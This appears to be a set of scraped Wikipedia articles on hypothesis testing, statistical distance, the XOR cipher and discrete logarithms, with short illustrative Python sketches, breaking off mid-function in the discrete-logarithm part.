it is fair) in 1 out of 20 tests on average. Thep-value does not provide the probability that either the null hypothesis or its opposite is correct (a common source of confusion).[37] If thep-value is less than the chosen significance threshold (equivalently, if the observed test statistic is in the critical region), then we say the null hypothesis is rejected at the chosen level of significance. If thep-value isnotless than the chosen significance threshold (equivalently, if the observed test statistic is outside the critical region), then the null hypothesis is not rejected at the chosen level of significance. In the "lady tasting tea" example (below), Fisher required the lady to properly categorize all of the cups of tea to justify the conclusion that the result was unlikely to result from chance. His test revealed that if the lady was effectively guessing at random (the null hypothesis), there was a 1.4% chance that the observed results (perfectly ordered tea) would occur. Statistics are helpful in analyzing most collections of data. This is equally true of hypothesis testing which can justify conclusions even when no scientific theory exists. 
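The 1.4% figure for the tea-tasting experiment can be reproduced directly: under the null hypothesis the lady is effectively choosing 4 cups at random out of 8, so only 1 of the C(8, 4) = 70 equally likely selections is perfectly correct. A minimal sketch:

from math import comb

# Probability of identifying all 4 "milk first" cups by pure guessing:
# one perfect selection out of C(8, 4) equally likely ways to pick 4 cups from 8.
p_value = 1 / comb(8, 4)
print(comb(8, 4), p_value)   # 70  0.0142857...  (about 1.4%)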
In the Lady tasting tea example, it was "obvious" that no difference existed between (milk poured into tea) and (tea poured into milk). The data contradicted the "obvious". Real world applications of hypothesis testing include:[38] Statistical hypothesis testing plays an important role in the whole of statistics and instatistical inference. For example, Lehmann (1992) in a review of the fundamental paper by Neyman and Pearson (1933) says: "Nevertheless, despite their shortcomings, the new paradigm formulated in the 1933 paper, and the many developments carried out within its framework continue to play a central role in both the theory and practice of statistics and can be expected to do so in the foreseeable future". Significance testing has been the favored statistical tool in some experimental social sciences (over 90% of articles in theJournal of Applied Psychologyduring the early 1990s).[39]Other fields have favored the estimation of parameters (e.g.effect size). Significance testing is used as a substitute for the traditional comparison of predicted value and experimental result at the core of thescientific method. When theory is only capable of predicting the sign of a relationship, a directional (one-sided) hypothesis test can be configured so that only a statistically significant result supports theory. This form of theory appraisal is the most heavily criticized application of hypothesis testing. "If the government required statistical procedures to carry warning labels like those on drugs, most inference methods would have long labels indeed."[40]This caution applies to hypothesis tests and alternatives to them. The successful hypothesis test is associated with a probability and a type-I error rate. The conclusionmightbe wrong. The conclusion of the test is only as solid as the sample upon which it is based. The design of the experiment is critical. A number of unexpected effects have been observed including: A statistical analysis of misleading data produces misleading conclusions. The issue of data quality can be more subtle. Inforecastingfor example, there is no agreement on a measure of forecast accuracy. In the absence of a consensus measurement, no decision based on measurements will be without controversy. Publication bias: Statistically nonsignificant results may be less likely to be published, which can bias the literature. Multiple testing: When multiple true null hypothesis tests are conducted at once without adjustment, the overall probability of Type I error is higher than the nominal alpha level.[41] Those making critical decisions based on the results of a hypothesis test are prudent to look at the details rather than the conclusion alone. In the physical sciences most results are fully accepted only when independently confirmed. The general advice concerning statistics is, "Figures never lie, but liars figure" (anonymous). The following definitions are mainly based on the exposition in the book by Lehmann and Romano:[36] A statistical hypothesis test compares a test statistic (zortfor examples) to a threshold. The test statistic (the formula found in the table below) is based on optimality. For a fixed level of Type I error rate, use of these statistics minimizes Type II error rates (equivalent to maximizing power). The following terms describe tests in terms of such optimality: Bootstrap-basedresamplingmethods can be used for null hypothesis testing. 
A bootstrap creates numerous simulated samples by randomly resampling (with replacement) the original, combined sample data, assuming the null hypothesis is correct. The bootstrap is very versatile as it is distribution-free and it does not rely on restrictive parametric assumptions, but rather on empirical approximate methods with asymptotic guarantees. Traditional parametric hypothesis tests are more computationally efficient but make stronger structural assumptions. In situations where computing the probability of the test statistic under the null hypothesis is hard or impossible (due to perhaps inconvenience or lack of knowledge of the underlying distribution), the bootstrap offers a viable method for statistical inference.[43][44][45][46] The earliest use of statistical hypothesis testing is generally credited to the question of whether male and female births are equally likely (null hypothesis), which was addressed in the 1700s by John Arbuthnot (1710),[47] and later by Pierre-Simon Laplace (1770s).[48] Arbuthnot examined birth records in London for each of the 82 years from 1629 to 1710, and applied the sign test, a simple non-parametric test.[49][50][51] In every year, the number of males born in London exceeded the number of females. Considering more male or more female births as equally likely, the probability of the observed outcome is 0.5^82, or about 1 in 4,836,000,000,000,000,000,000,000; in modern terms, this is the p-value. Arbuthnot concluded that this is too small to be due to chance and must instead be due to divine providence: "From whence it follows, that it is Art, not Chance, that governs." In modern terms, he rejected the null hypothesis of equally likely male and female births at the p = 1/2^82 significance level. Laplace considered the statistics of almost half a million births. The statistics showed an excess of boys compared to girls.[5] He concluded by calculation of a p-value that the excess was a real, but unexplained, effect.[52] In a famous example of hypothesis testing, known as the Lady tasting tea,[53] Dr. Muriel Bristol, a colleague of Fisher, claimed to be able to tell whether the tea or the milk was added first to a cup. Fisher proposed to give her eight cups, four of each variety, in random order. One could then ask what the probability was for her getting the number she got correct, but just by chance. The null hypothesis was that the Lady had no such ability. The test statistic was a simple count of the number of successes in selecting the 4 cups. The critical region was the single case of 4 successes of 4 possible based on a conventional probability criterion (< 5%). A pattern of 4 successes corresponds to 1 out of 70 possible combinations (p ≈ 1.4%). Fisher asserted that no alternative hypothesis was (ever) required. The lady correctly identified every cup,[54] which would be considered a statistically significant result. A statistical test procedure is comparable to a criminal trial; a defendant is considered not guilty as long as his or her guilt is not proven. The prosecutor tries to prove the guilt of the defendant. Only when there is enough evidence for the prosecution is the defendant convicted. In the start of the procedure, there are two hypotheses, H0: "the defendant is not guilty", and H1: "the defendant is guilty". The first one, H0, is called the null hypothesis. The second one, H1, is called the alternative hypothesis. It is the alternative hypothesis that one hopes to support.
The hypothesis of innocence is rejected only when an error is very unlikely, because one does not want to convict an innocent defendant. Such an error is callederror of the first kind(i.e., the conviction of an innocent person), and the occurrence of this error is controlled to be rare. As a consequence of this asymmetric behaviour, anerror of the second kind(acquitting a person who committed the crime), is more common. A criminal trial can be regarded as either or both of two decision processes: guilty vs not guilty or evidence vs a threshold ("beyond a reasonable doubt"). In one view, the defendant is judged; in the other view the performance of the prosecution (which bears the burden of proof) is judged. A hypothesis test can be regarded as either a judgment of a hypothesis or as a judgment of evidence. A person (the subject) is tested forclairvoyance. They are shown the back face of a randomly chosen playing card 25 times and asked which of the foursuitsit belongs to. The number of hits, or correct answers, is calledX. As we try to find evidence of their clairvoyance, for the time being the null hypothesis is that the person is not clairvoyant.[55]The alternative is: the person is (more or less) clairvoyant. If the null hypothesis is valid, the only thing the test person can do is guess. For every card, the probability (relative frequency) of any single suit appearing is 1/4. If the alternative is valid, the test subject will predict the suit correctly with probability greater than 1/4. We will call the probability of guessing correctlyp. The hypotheses, then, are: H0: p = 1/4 (the subject is merely guessing) and H1: p > 1/4 (the subject is clairvoyant to some degree). When the test subject correctly predicts all 25 cards, we will consider them clairvoyant, and reject the null hypothesis. Thus also with 24 or 23 hits. With only 5 or 6 hits, on the other hand, there is no cause to consider them so. But what about 12 hits, or 17 hits? What is the critical number,c, of hits, at which point we consider the subject to be clairvoyant? How do we determine the critical valuec? With the choicec=25 (i.e. we only accept clairvoyance when all cards are predicted correctly) we're more critical than withc=10. In the first case almost no test subjects will be recognized to be clairvoyant, in the second case, a certain number will pass the test. In practice, one decides how critical one will be. That is, one decides how often one accepts an error of the first kind – afalse positive, or Type I error. Withc= 25 the probability of such an error is P(X = 25 | p = 1/4) = (1/4)^25 ≈ 10^-15, and hence, very small. The probability of a false positive is the probability of randomly guessing correctly all 25 times. Being less critical, withc= 10, gives P(X ≥ 10 | p = 1/4) ≈ 0.07. Thus,c= 10 yields a much greater probability of false positive. Before the test is actually performed, the maximum acceptable probability of a Type I error (α) is determined. Typically, values in the range of 1% to 5% are selected. (If the maximum acceptable error rate is zero, an infinite number of correct guesses is required.) Depending on this Type I error rate, the critical valuecis calculated. For example, if we select an error rate of 1%,cis calculated from the condition P(X ≥ c | p = 1/4) ≤ 0.01. From all the numbers c with this property, we choose the smallest, in order to minimize the probability of a Type II error, afalse negative. For the above example, we select:c=13{\displaystyle c=13}. Statistical hypothesis testing is a key technique of bothfrequentist inferenceandBayesian inference, although the two types of inference have notable differences.
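The critical value above can be reproduced with exact binomial tail probabilities; the following is a minimal sketch using only the standard library, with the α values quoted in the text.

from math import comb

def binom_tail(n, p, c):
    """P(X >= c) for X ~ Binomial(n, p)."""
    return sum(comb(n, k) * p**k * (1 - p)**(n - k) for k in range(c, n + 1))

def critical_value(n=25, p=0.25, alpha=0.01):
    """Smallest c with P(X >= c | H0) <= alpha (Type I error control)."""
    for c in range(n + 1):
        if binom_tail(n, p, c) <= alpha:
            return c
    return n + 1  # only reached if alpha is effectively zero

print(critical_value(alpha=0.01))   # 13, matching the example above
print(binom_tail(25, 0.25, 10))     # about 0.07: the false-positive rate for c = 10
print(binom_tail(25, 0.25, 25))     # (1/4)**25, roughly 10**-15: all 25 correct by chance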
Statistical hypothesis tests define a procedure that controls (fixes) the probability of incorrectlydecidingthat a default position (null hypothesis) is incorrect. The procedure is based on how likely it would be for a set of observations to occur if the null hypothesis were true. This probability of making an incorrect decision isnotthe probability that the null hypothesis is true, nor whether any specific alternative hypothesis is true. This contrasts with other possible techniques ofdecision theoryin which the null andalternative hypothesisare treated on a more equal basis. One naïveBayesianapproach to hypothesis testing is to base decisions on theposterior probability,[56][57]but this fails when comparing point and continuous hypotheses. Other approaches to decision making, such asBayesian decision theory, attempt to balance the consequences of incorrect decisions across all possibilities, rather than concentrating on a single null hypothesis. A number of other approaches to reaching a decision based on data are available viadecision theoryandoptimal decisions, some of which have desirable properties. Hypothesis testing, though, is a dominant approach to data analysis in many fields of science. Extensions to the theory of hypothesis testing include the study of thepowerof tests, i.e. the probability of correctly rejecting the null hypothesis given that it is false. Such considerations can be used for the purpose ofsample size determinationprior to the collection of data. An example of Neyman–Pearson hypothesis testing (or null hypothesis statistical significance testing) can be made by a change to the radioactive suitcase example. If the "suitcase" is actually a shielded container for the transportation of radioactive material, then a test might be used to select among three hypotheses: no radioactive source present, one present, two (all) present. The test could be required for safety, with actions required in each case. TheNeyman–Pearson lemmaof hypothesis testing says that a good criterion for the selection of hypotheses is the ratio of their probabilities (alikelihood ratio). A simple method of solution is to select the hypothesis with the highest probability for the Geiger counts observed. The typical result matches intuition: few counts imply no source, many counts imply two sources and intermediate counts imply one source. Notice also that usually there are problems forproving a negative. Null hypotheses should be at leastfalsifiable. Neyman–Pearson theory can accommodate both prior probabilities and the costs of actions resulting from decisions.[58]The former allows each test to consider the results of earlier tests (unlike Fisher's significance tests). The latter allows the consideration of economic issues (for example) as well as probabilities. A likelihood ratio remains a good criterion for selecting among hypotheses. The two forms of hypothesis testing are based on different problem formulations. The original test is analogous to a true/false question; the Neyman–Pearson test is more like multiple choice. In the view ofTukey[59]the former produces a conclusion on the basis of only strong evidence while the latter produces a decision on the basis of available evidence. While the two tests seem quite different both mathematically and philosophically, later developments lead to the opposite claim. Consider many tiny radioactive sources. The hypotheses become 0,1,2,3... grains of radioactive sand. 
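A minimal sketch of the suitcase example just described: choose whichever of the three hypotheses gives the observed Geiger counts the highest likelihood, which with equal priors coincides with the likelihood-ratio criterion. The Poisson rates below are invented for illustration.

from math import factorial, log

# Hypothetical mean Geiger counts per measurement interval for each hypothesis.
RATES = {"no source": 0.5, "one source": 5.0, "two sources": 10.0}

def log_likelihood(counts, lam):
    """Log-likelihood of i.i.d. Poisson(lam) observations."""
    return sum(-lam + k * log(lam) - log(factorial(k)) for k in counts)

def select_hypothesis(counts):
    """Pick the hypothesis with the highest likelihood for the observed counts."""
    return max(RATES, key=lambda name: log_likelihood(counts, RATES[name]))

print(select_hypothesis([0, 1, 0, 0, 1]))     # few counts          -> "no source"
print(select_hypothesis([4, 6, 5, 5, 7]))     # intermediate counts -> "one source"
print(select_hypothesis([11, 9, 12, 10, 8]))  # many counts         -> "two sources"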
There is little distinction between none or some radiation (Fisher) and 0 grains of radioactive sand versus all of the alternatives (Neyman–Pearson). The major Neyman–Pearson paper of 1933[11]also considered composite hypotheses (ones whose distribution includes an unknown parameter). An example proved the optimality of the (Student's)t-test, "there can be no better test for the hypothesis under consideration" (p 321). Neyman–Pearson theory was proving the optimality of Fisherian methods from its inception. Fisher's significance testing has proven a popular flexible statistical tool in application with little mathematical growth potential. Neyman–Pearson hypothesis testing is claimed as a pillar of mathematical statistics,[60]creating a new paradigm for the field. It also stimulated new applications instatistical process control,detection theory,decision theoryandgame theory. Both formulations have been successful, but the successes have been of a different character. The dispute over formulations is unresolved. Science primarily uses Fisher's (slightly modified) formulation as taught in introductory statistics. Statisticians study Neyman–Pearson theory in graduate school. Mathematicians are proud of uniting the formulations. Philosophers consider them separately. Learned opinions deem the formulations variously competitive (Fisher vs Neyman), incompatible[9]or complementary.[13]The dispute has become more complex since Bayesian inference has achieved respectability. The terminology is inconsistent. Hypothesis testing can mean any mixture of two formulations that both changed with time. Any discussion of significance testing vs hypothesis testing is doubly vulnerable to confusion. Fisher thought that hypothesis testing was a useful strategy for performing industrial quality control; however, he strongly disagreed that hypothesis testing could be useful for scientists.[10]Hypothesis testing provides a means of finding test statistics used in significance testing.[13]The concept of power is useful in explaining the consequences of adjusting the significance level and is heavily used insample size determination. The two methods remain philosophically distinct.[15]They usually (butnot always) produce the same mathematical answer. The preferred answer is context dependent.[13]While the existing merger of Fisher and Neyman–Pearson theories has been heavily criticized, modifying the merger to achieve Bayesian goals has been considered.[61] Criticism of statistical hypothesis testing fills volumes.[62][63][64][65][66][67]Much of the criticism can be summarized by the following issues: Critics and supporters are largely in factual agreement regarding the characteristics of null hypothesis significance testing (NHST): While it can provide critical information, it is inadequate as the sole tool for statistical analysis. Successfully rejecting the null hypothesis may offer no support for the research hypothesis. The continuing controversy concerns the selection of the best statistical practices for the near-term future given the existing practices. However, adequate research design can minimize this issue. Critics would prefer to ban NHST completely, forcing a complete departure from those practices,[78]while supporters suggest a less absolute change. Controversy over significance testing, and its effects on publication bias in particular, has produced several results.
TheAmerican Psychological Associationhas strengthened its statistical reporting requirements after review,[79]medical journalpublishers have recognized the obligation to publish some results that are not statistically significant to combat publication bias,[80]and a journal (Journal of Articles in Support of the Null Hypothesis) has been created to publish such results exclusively.[81]Textbooks have added some cautions,[82]and increased coverage of the tools necessary to estimate the size of the sample required to produce significant results. Few major organizations have abandoned use of significance tests although some have discussed doing so.[79]For instance, in 2023, the editors of theJournal of Physiology"strongly recommend the use of estimation methods for those publishing in The Journal" (meaning the magnitude of theeffect size(to allow readers to judge whether a finding has practical, physiological, or clinical relevance) andconfidence intervalsto convey the precision of that estimate), saying "Ultimately, it is the physiological importance of the data that those publishing in The Journal of Physiology should be most concerned with, rather than the statistical significance."[83] A unifying position of critics is that statistics should not lead to an accept-reject conclusion or decision, but to an estimated value with aninterval estimate; this data-analysis philosophy is broadly referred to asestimation statistics. Estimation statistics can be accomplished with either frequentist[84]or Bayesian methods.[85][86] Critics of significance testing have advocated basing inference less on p-values and more on confidence intervals for effect sizes for importance, prediction intervals for confidence, replications and extensions for replicability, and meta-analyses for generality.[87]But none of these suggested alternatives inherently produces a decision. Lehmann said that hypothesis testing theory can be presented in terms of conclusions/decisions, probabilities, or confidence intervals: "The distinction between the ... approaches is largely one of reporting and interpretation."[26] Bayesian inferenceis one proposed alternative to significance testing. (Nickerson cited 10 sources suggesting it, including Rozeboom (1960)).[18]For example, Bayesianparameter estimationcan provide rich information about the data from which researchers can draw inferences, while using uncertainpriorsthat exert only minimal influence on the results when enough data is available. PsychologistJohn K. Kruschkehas suggested Bayesian estimation as an alternative for thet-test[85]and has also contrasted Bayesian estimation for assessing null values with Bayesian model comparison for hypothesis testing.[86]Two competing models/hypotheses can be compared usingBayes factors.[88]Bayesian methods could be criticized for requiring information that is seldom available in the cases where significance testing is most heavily used. Neither the prior probabilities nor theprobability distributionof the test statistic under the alternative hypothesis are often available in the social sciences.[18] Advocates of a Bayesian approach sometimes claim that the goal of a researcher is most often toobjectivelyassess theprobabilitythat ahypothesisis true based on the data they have collected.[89][90]NeitherFisher's significance testing, norNeyman–Pearsonhypothesis testing can provide this information, and neither claims to.
The probability a hypothesis is true can only be derived from use ofBayes' Theorem, which was unsatisfactory to both the Fisher and Neyman–Pearson camps due to the explicit use ofsubjectivityin the form of theprior probability.[11][91]Fisher's strategy is to sidestep this with thep-value(an objectiveindexbased on the data alone) followed byinductive inference, while Neyman–Pearson devised their approach ofinductive behaviour.
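As a minimal illustration of that contrast, the following sketch applies Bayes' theorem to two simple hypotheses about a success rate, loosely modeled on the card-guessing example earlier; the alternative rate and the prior probabilities are invented, which is exactly the kind of input the Fisher and Neyman–Pearson approaches decline to use.

from math import comb

def likelihood(hits, n, p):
    """Binomial likelihood of observing `hits` successes in n trials."""
    return comb(n, hits) * p**hits * (1 - p)**(n - hits)

def posterior_prob_null(hits, n, p_null=0.25, p_alt=0.5, prior_null=0.5):
    """P(H0 | data) via Bayes' theorem for two simple hypotheses about the
    success rate. The alternative rate and the priors are illustrative only."""
    prior_alt = 1 - prior_null
    num = likelihood(hits, n, p_null) * prior_null
    den = num + likelihood(hits, n, p_alt) * prior_alt
    return num / den

# 25 card-guessing trials, as in the clairvoyance example:
print(posterior_prob_null(hits=6, n=25))    # close to 1: data favour "just guessing"
print(posterior_prob_null(hits=14, n=25))   # close to 0: data favour the alternative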
https://en.wikipedia.org/wiki/Hypothesis_testing
Instatistics,probability theory, andinformation theory, astatistical distancequantifies thedistancebetween two statistical objects, which can be tworandom variables, or twoprobability distributionsorsamples, or the distance can be between an individual sample point and a population or a wider sample of points. A distance between populations can be interpreted as measuring the distance between twoprobability distributionsand hence such distances are essentially measures of distances betweenprobability measures. Where statistical distance measures relate to the differences betweenrandom variables, these may havestatistical dependence,[1]and hence these distances are not directly related to measures of distances between probability measures. Again, a measure of distance between random variables may relate to the extent of dependence between them, rather than to their individual values. Many statistical distance measures are notmetrics, and some are not symmetric. Some types of distance measures, which generalizesquareddistance, are referred to as (statistical)divergences. Many terms are used to refer to various notions of distance; these are often confusingly similar, and may be used inconsistently between authors and over time, either loosely or with precise technical meaning. In addition to "distance", similar terms includedeviance,deviation,discrepancy, discrimination, anddivergence, as well as others such ascontrast functionandmetric. Terms frominformation theoryincludecross entropy,relative entropy,discrimination information, andinformation gain. Ametricon a setXis afunction(called thedistance functionor simplydistance)d:X×X→R+(whereR+is the set of non-negativereal numbers). For allx,y,zinX, this function is required to satisfy the following conditions: (1) d(x, y) ≥ 0 (non-negativity); (2) d(x, y) = 0 if and only if x = y (identity of indiscernibles); (3) d(x, y) = d(y, x) (symmetry); and (4) d(x, z) ≤ d(x, y) + d(y, z) (the triangle inequality). Many statistical distances are notmetrics, because they lack one or more properties of proper metrics. For example,pseudometricsviolate property (2), identity of indiscernibles;quasimetricsviolate property (3), symmetry; andsemimetricsviolate property (4), the triangle inequality. Statistical distances that satisfy (1) and (2) are referred to asdivergences. Thetotal variation distanceof two distributionsX{\displaystyle X}andY{\displaystyle Y}over a finite domainD{\displaystyle D}, (often referred to asstatistical difference[2]orstatistical distance[3]in cryptography) is defined as Δ(X,Y)=12∑α∈D|Pr[X=α]−Pr[Y=α]|{\displaystyle \Delta (X,Y)={\frac {1}{2}}\sum _{\alpha \in D}|\Pr[X=\alpha ]-\Pr[Y=\alpha ]|}. We say that twoprobability ensembles{Xk}k∈N{\displaystyle \{X_{k}\}_{k\in \mathbb {N} }}and{Yk}k∈N{\displaystyle \{Y_{k}\}_{k\in \mathbb {N} }}are statistically close ifΔ(Xk,Yk){\displaystyle \Delta (X_{k},Y_{k})}is anegligible functionink{\displaystyle k}.
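A minimal sketch of the total variation distance over a finite domain, following the definition above; the example distributions are invented.

def total_variation_distance(p, q):
    """Delta(X, Y) = 1/2 * sum over alpha of |Pr[X = alpha] - Pr[Y = alpha]|,
    for two distributions given as dictionaries over a finite domain."""
    support = set(p) | set(q)
    return 0.5 * sum(abs(p.get(a, 0.0) - q.get(a, 0.0)) for a in support)

# A fair die versus a die slightly loaded toward 6 (illustrative numbers):
fair   = {face: 1 / 6 for face in range(1, 7)}
loaded = {1: 0.15, 2: 0.15, 3: 0.15, 4: 0.15, 5: 0.15, 6: 0.25}
print(total_variation_distance(fair, loaded))  # about 0.083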
https://en.wikipedia.org/wiki/Statistical_distance
Incryptography, thesimple XOR cipheris a type ofadditivecipher,[1]anencryption algorithmthat operates according to the principles A ⊕ 0 = A, A ⊕ A = 0, (A ⊕ B) ⊕ C = A ⊕ (B ⊕ C), and (B ⊕ A) ⊕ A = B ⊕ 0 = B, where⊕{\displaystyle \oplus }denotes theexclusive disjunction(XOR) operation.[2]This operation is sometimes called modulus 2 addition (or subtraction, which is identical).[3]With this logic, a string of text can be encrypted by applying the bitwise XOR operator to every character using a given key. To decrypt the output, merely reapplying the XOR function with the key will remove the cipher. The string "Wiki" (01010111 01101001 01101011 01101001in 8-bitASCII) can be encrypted with the repeating key11110011as follows: 01010111 01101001 01101011 01101001 ⊕ 11110011 11110011 11110011 11110011 = 10100100 10011010 10011000 10011010. And conversely, for decryption: 10100100 10011010 10011000 10011010 ⊕ 11110011 11110011 11110011 11110011 = 01010111 01101001 01101011 01101001. The XOR operator is extremely common as a component in more complex ciphers. By itself, using a constant repeating key, a simple XOR cipher can trivially be broken usingfrequency analysis. If the content of any message can be guessed or otherwise known then the key can be revealed. Its primary merit is that it is simple to implement, and that the XOR operation is computationally inexpensive. A simple repeating XOR (i.e. using the same key for the XOR operation on the whole data) cipher is therefore sometimes used for hiding information in cases where no particular security is required. The XOR cipher is often used in computermalwareto make reverse engineering more difficult. If the key is random and is at least as long as the message, the XOR cipher is much more secure than when there is key repetition within a message.[4]When the keystream is generated by apseudo-random number generator, the result is astream cipher. With a key that istruly random, the result is aone-time pad, which isunbreakable in theory. The XOR operator in any of these ciphers is vulnerable to aknown-plaintext attack, sinceplaintext⊕{\displaystyle \oplus }ciphertext=key. It is also trivial to flip arbitrary bits in the decrypted plaintext by manipulating the ciphertext. This is calledmalleability. The primary reason XOR is so useful in cryptography is because it is "perfectly balanced"; for a given plaintext input 0 or 1, the ciphertext result is equally likely to be either 0 or 1 for a truly random key bit.[5] The four possible pairs of plaintext and key bits give 0 ⊕ 0 = 0, 0 ⊕ 1 = 1, 1 ⊕ 0 = 1, and 1 ⊕ 1 = 0. It is clear that if nothing is known about the key or plaintext, nothing can be determined from the ciphertext alone.[5] Other logical operations such asANDorORdo not have such a mapping (for example, AND would produce three 0's and one 1, so knowing that a given ciphertext bit is a 0 implies that there is a 2/3 chance that the original plaintext bit was a 0, as opposed to the ideal 1/2 chance in the case of XOR)[a] Example using thePythonprogramming language.[b] A shorter example using theRprogramming language, based on apuzzleposted on Instagram byGCHQ.
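Those original examples are not reproduced in this text; the following is a minimal, illustrative Python sketch of the repeating-key XOR described above (the helper name xor_cipher is ours; the message and key are the ones from the "Wiki" example).

def xor_cipher(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt by XORing each byte with the repeating key.
    The operation is its own inverse: applying it twice restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

message = b"Wiki"              # 01010111 01101001 01101011 01101001
key     = bytes([0b11110011])  # repeating single-byte key

ciphertext = xor_cipher(message, key)
print(ciphertext.hex())             # a49a989a -> 10100100 10011010 10011000 10011010
print(xor_cipher(ciphertext, key))  # b'Wiki'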
https://en.wikipedia.org/wiki/XOR_cipher
Inmathematics, for givenreal numbersa{\displaystyle a}andb{\displaystyle b}, thelogarithmlogb⁡(a){\displaystyle \log _{b}(a)}is a numberx{\displaystyle x}such thatbx=a{\displaystyle b^{x}=a}. Analogously, in anygroupG{\displaystyle G}, powersbk{\displaystyle b^{k}}can be defined for allintegersk{\displaystyle k}, and thediscrete logarithmlogb⁡(a){\displaystyle \log _{b}(a)}is an integerk{\displaystyle k}such thatbk=a{\displaystyle b^{k}=a}. Inarithmetic moduloan integerm{\displaystyle m}, the more commonly used term isindex: One can writek=indba(modm){\displaystyle k=\mathbb {ind} _{b}a{\pmod {m}}}(read "the index ofa{\displaystyle a}to the baseb{\displaystyle b}modulom{\displaystyle m}") forbk≡a(modm){\displaystyle b^{k}\equiv a{\pmod {m}}}ifb{\displaystyle b}is aprimitive rootofm{\displaystyle m}andgcd(a,m)=1{\displaystyle \gcd(a,m)=1}. Discrete logarithms are quickly computable in a few special cases. However, no efficient method is known for computing them in general. In cryptography, the computational complexity of the discrete logarithm problem, along with its application, was first proposed in theDiffie–Hellman problem. Several importantalgorithmsinpublic-key cryptography, such asElGamal, base their security on thehardness assumptionthat the discrete logarithm problem (DLP) over carefully chosen groups has no efficient solution.[1] LetG{\displaystyle G}be any group. Denote itsgroup operationby multiplication and itsidentity elementby1{\displaystyle 1}. Letb{\displaystyle b}be any element ofG{\displaystyle G}. For any positive integerk{\displaystyle k}, the expressionbk{\displaystyle b^{k}}denotes the product ofb{\displaystyle b}with itselfk{\displaystyle k}times:[2] Similarly, letb−k{\displaystyle b^{-k}}denote the product ofb−1{\displaystyle b^{-1}}with itselfk{\displaystyle k}times. Fork=0{\displaystyle k=0}, thek{\displaystyle k}thpower is the identity:b0=1{\displaystyle b^{0}=1}. Leta{\displaystyle a}also be an element ofG{\displaystyle G}. An integerk{\displaystyle k}that solves the equationbk=a{\displaystyle b^{k}=a}is termed adiscrete logarithm(or simplylogarithm, in this context) ofa{\displaystyle a}to the baseb{\displaystyle b}. One writesk=logb⁡a{\displaystyle k=\log _{b}a}. Thepowers of 10are For any numbera{\displaystyle a}in this list, one can computelog10⁡a{\displaystyle \log _{10}a}. For example,log10⁡10000=4{\displaystyle \log _{10}{10000}=4}, andlog10⁡0.001=−3{\displaystyle \log _{10}{0.001}=-3}. These are instances of the discrete logarithm problem. Other base-10 logarithms in the real numbers are not instances of the discrete logarithm problem, because they involve non-integer exponents. For example, the equationlog10⁡53=1.724276…{\displaystyle \log _{10}{53}=1.724276\ldots }means that101.724276…{\displaystyle 10^{1.724276\ldots }}. While integer exponents can be defined in any group using products and inverses, arbitrary real exponents, such as this 1.724276…, require other concepts such as theexponential function. Ingroup-theoreticterms, the powers of 10 form acyclic groupG{\displaystyle G}under multiplication, and 10 is ageneratorfor this group. The discrete logarithmlog10⁡a{\displaystyle \log _{10}a}is defined for anya{\displaystyle a}inG{\displaystyle G}. A similar example holds for any non-zero real numberb{\displaystyle b}. The powers form a multiplicativesubgroupG={…,b−2,b−1,1,b1,b2,…}{\displaystyle G=\{\ldots ,b^{-2},b^{-1},1,b^{1},b^{2},\ldots \}}of the non-zero real numbers. 
For any elementa{\displaystyle a}ofG{\displaystyle G}, one can computelogb⁡a{\displaystyle \log _{b}a}. One of the simplest settings for discrete logarithms is the groupZp×. This is the group of multiplicationmodulotheprimep{\displaystyle p}. Its elements are non-zerocongruence classesmodulop{\displaystyle p}, and the group product of two elements may be obtained by ordinary integer multiplication of the elements followed by reduction modulop{\displaystyle p}. Thek{\displaystyle k}thpowerof one of the numbers in this group may be computed by finding its 'k{\displaystyle k}thpower as an integer and then finding the remainder after division byp{\displaystyle p}. When the numbers involved are large, it is more efficient to reduce modulop{\displaystyle p}multiple times during the computation. Regardless of the specific algorithm used, this operation is calledmodular exponentiation. For example, considerZ17×. To compute34{\displaystyle 3^{4}}in this group, compute34=81{\displaystyle 3^{4}=81}, and then divide81{\displaystyle 81}by17{\displaystyle 17}, obtaining a remainder of13{\displaystyle 13}. Thus34=13{\displaystyle 3^{4}=13}in the groupZ17×. The discrete logarithm is just the inverse operation. For example, consider the equation3k≡13(mod17){\displaystyle 3^{k}\equiv 13{\pmod {17}}}. From the example above, one solution isk=4{\displaystyle k=4}, but it is not the only solution. Since316≡1(mod17){\displaystyle 3^{16}\equiv 1{\pmod {17}}}—as follows fromFermat's little theorem— it also follows that ifn{\displaystyle n}is an integer then34+16n≡34⋅(316)n≡34⋅1n≡34≡13(mod17){\displaystyle 3^{4+16n}\equiv 3^{4}\cdot (3^{16})^{n}\equiv 3^{4}\cdot 1^{n}\equiv 3^{4}\equiv 13{\pmod {17}}}. Hence the equation has infinitely many solutions of the form4+16n{\displaystyle 4+16n}. Moreover, because16{\displaystyle 16}is the smallest positive integerm{\displaystyle m}satisfying3m≡1(mod17){\displaystyle 3^{m}\equiv 1{\pmod {17}}}, these are the only solutions. Equivalently, the set of all possible solutions can be expressed by the constraint thatk≡4(mod16){\displaystyle k\equiv 4{\pmod {16}}}. In the special case whereb{\displaystyle b}is the identity element1{\displaystyle 1}of the groupG{\displaystyle G}, the discrete logarithmlogb⁡a{\displaystyle \log _{b}a}is undefined fora{\displaystyle a}other than1{\displaystyle 1}, and every integerk{\displaystyle k}is a discrete logarithm fora=1{\displaystyle a=1}. Powers obey the usual algebraic identitybk+l=bk⋅bl{\displaystyle b^{k+l}=b^{k}\cdot b^{l}}.[2]In other words, thefunction defined byf(k)=bk{\displaystyle f(k)=b^{k}}is agroup homomorphismfrom the group of integersZ{\displaystyle \mathbf {Z} }under additionontothesubgroupH{\displaystyle H}ofG{\displaystyle G}generatedbyb{\displaystyle b}. For alla{\displaystyle a}inH{\displaystyle H},logb⁡a{\displaystyle \log _{b}a}exists.Conversely,logb⁡a{\displaystyle \log _{b}a}does not exist fora{\displaystyle a}that are not inH{\displaystyle H}. IfH{\displaystyle H}isinfinite, thenlogb⁡a{\displaystyle \log _{b}a}is also unique, and the discrete logarithm amounts to agroup isomorphism On the other hand, ifH{\displaystyle H}isfiniteofordern{\displaystyle n}, thenlogb⁡a{\displaystyle \log _{b}a}is 0 unique only up tocongruence modulon{\displaystyle n}, and the discrete logarithm amounts to a group isomorphism whereZn{\displaystyle \mathbf {Z} _{n}}denotes the additive group of integers modulon{\displaystyle n}. 
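A minimal sketch of the two directions just described, reusing the Z17× example: modular exponentiation via Python's built-in pow, and the discrete logarithm recovered by exhaustive search, which is feasible only because the group is tiny.

def discrete_log(base, target, modulus):
    """Smallest non-negative k with base**k congruent to target (mod modulus),
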